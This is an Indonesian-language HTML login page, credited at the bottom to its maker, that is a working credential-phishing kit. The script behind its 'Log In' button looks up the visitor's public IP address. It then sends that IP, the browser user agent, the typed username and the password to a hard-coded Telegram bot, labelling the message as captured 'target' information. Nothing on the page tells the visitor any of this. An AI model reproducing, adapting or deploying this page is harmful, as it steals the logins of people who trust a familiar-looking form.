<!DOCTYPE html>
<html lang="in">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible"
    content="ie=edge">
      <link rel="icon" type="image/jpg" href="https://i.ibb.co.com/dqq1bmP/10900197.jpg">
      <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
    <title>Login Page</title>
</head>
<body>
    <center> <div class="topnav">
  <a href="register.html">Registrasi</a>
  <a class="active" href="index.html">Login</a>
  <a href="about.html">About</a><br><br>
  </div>
  <h1>Halaman Login</h1>
  <div class="inputhvr">
        <font style="font-family: Raleway;">
    <div>Username: </div><input id="usrnme" placeholder="Username"></input>
      <div>Password: </div><input id="pass" placeholder="Password" type="password"></input><button class="showpswd" type="checkbox" onclick="showpass()"><img id="icon" src="show.png" width="40px" alt=""><div class="textshow" id="textpass">Show Password</div></button>
<br><br><a href="">Forgot Password?</a><br><br>
<button onclick="getIp()" class="login">Log In</button>
</font>
</div>
</center>
    <style>
        body {
         background-image: linear-gradient(to right, rgba(255,0,0,0), rgba(0,0,255,1));
        }
                
        input {
            border-radius: 20px;
            height: 30px;
            width: 200px;
            border: none;
            display: flex;
        }
        .textshow {
            display: grid;
            justify-content: center;
        }
        .showpswd {
            padding: 0;
            border: none;           
            background: none;
        }
        .login {
            background-color: darkblue;
            border-radius: 25px;
            width: 120px;
            height: 35px;
            margin-right: 0;
            border: none;
            font-size: 18px;
            color: white;
        }
        .topnav {
          background-color: darkblue;
          overflow: hidden;
          height: 48px;
          width: 120;
        }
        .topnav a {
          float: left;
          color: #f2f2f2;
          text-align: center;
          padding: 14px 16px;
          text-decoration: none;
          font-size: 17px;

        }
        .topnav a:hover {
          background-color: #ddd;
          color: black;
        }
        .topnav a.active {
         background-color: #82EEFD;
         color: white;
        }
        .topnav a.active {
            color: black;
        }
         .inputhvr {
            background-image: linear-gradient(to left, rgba(255, 255, 255, 1), blue);
            overflow: hidden;
            height: 340px;
            width: 120;
            border-radius: 15px;
            margin-bottom: 10px;
         }
          div {
             color: black;
             font-size: 20px;
         }
    </style>
    <script>
        const agent = navigator.userAgent;
        
        async function getIp() {
        let ipyu;
        await
fetch('https://api.ipify.org?format=json')
.then(response => response.json())
.then(data => ipyu = data.ip)
.catch(error => console.error(error));
        var usr = document.getElementById("usrnme").value;
        var pass = document.getElementById("pass").value;
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://api.telegram.org/bot7579364761:AAFfag2e5i1LP0-7AVATP9BbgMQUJh1ez-U/sendMessage?parse_mode=markdown&", true);
        xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
        var data = "chat_id=6469804005&text=Berhasil Mendapat Info Target\n\nIp Target: "+encodeURIComponent(ipyu)+"\n\nUser Agent:\n\n"+encodeURIComponent(agent)+"\n\nUsername: \n"+encodeURIComponent(usr)+"\n\nPassword: \n"+encodeURIComponent(pass);
xhr.send(data);
        }
        function showpass() {
            var x = document.getElementById("pass");
            var a = document.getElementById("icon");
            var b = document.getElementById("textpass")
            if (x.type == "password") {
                x.type = "text";
                a.src = "hide.png";
                a.style.width = "32px";    
                b.innerHTML="Hide Password";
            } else {
                x.type = "password";
                a.src = "show.png";
                a.style.width = "40px";
                b.innerHTML = "Show Password"
            }
        }
    </script>
    <h2>Made By FajarMuharomi</h2>
</body>
</html>
